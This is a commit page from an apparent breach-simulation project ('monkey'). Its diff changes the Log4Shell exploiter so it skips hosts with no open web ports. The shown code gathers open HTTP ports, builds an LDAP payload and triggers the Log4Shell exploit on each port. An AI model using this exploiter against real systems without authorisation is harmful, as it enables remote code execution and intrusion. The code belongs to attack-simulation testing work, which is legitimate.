p17860254
/
monkey
forked from p15670423/monkey
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Agent: Skip Log4Shell exploiter if there are no open ports

This commit is contained in:
Mike Salvatore 2022-01-20 08:52:09 -05:00
parent 6d87289bd0
commit e576136a63
1 changed files with 8 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
monkey/infection_monkey/exploit/log4shell.py
View File

@ -45,8 +45,15 @@ class Log4ShellExploiter(WebRCE):
self._ldap_server = None self._ldap_server = None
self._exploit_class_http_server = None self._exploit_class_http_server = None
self._agent_http_server_thread = None self._agent_http_server_thread = None
self._open_ports = [
int(port[0]) for port in WebRCE.get_open_service_ports(self.host, self.HTTP, ["http"])
]
def _exploit_host(self): def _exploit_host(self):
if not self._open_ports:
logger.info("Could not find any open web ports to exploit")
return False
self._start_servers() self._start_servers()
try: try:
return self.exploit(None, None) return self.exploit(None, None)
@ -130,11 +137,8 @@ class Log4ShellExploiter(WebRCE):
def exploit(self, url, command) -> bool: def exploit(self, url, command) -> bool:
# Try to exploit all services, # Try to exploit all services,
# because we don't know which services are running and on which ports # because we don't know which services are running and on which ports
open_ports = [
int(port[0]) for port in WebRCE.get_open_service_ports(self.host, self.HTTP, ["http"])
]
for exploit in get_log4shell_service_exploiters(): for exploit in get_log4shell_service_exploiters():
for port in open_ports: for port in self._open_ports:
try: try:
exploit.trigger_exploit(self._build_ldap_payload(), self.host, port) exploit.trigger_exploit(self._build_ldap_payload(), self.host, port)
except Exception as ex: except Exception as ex: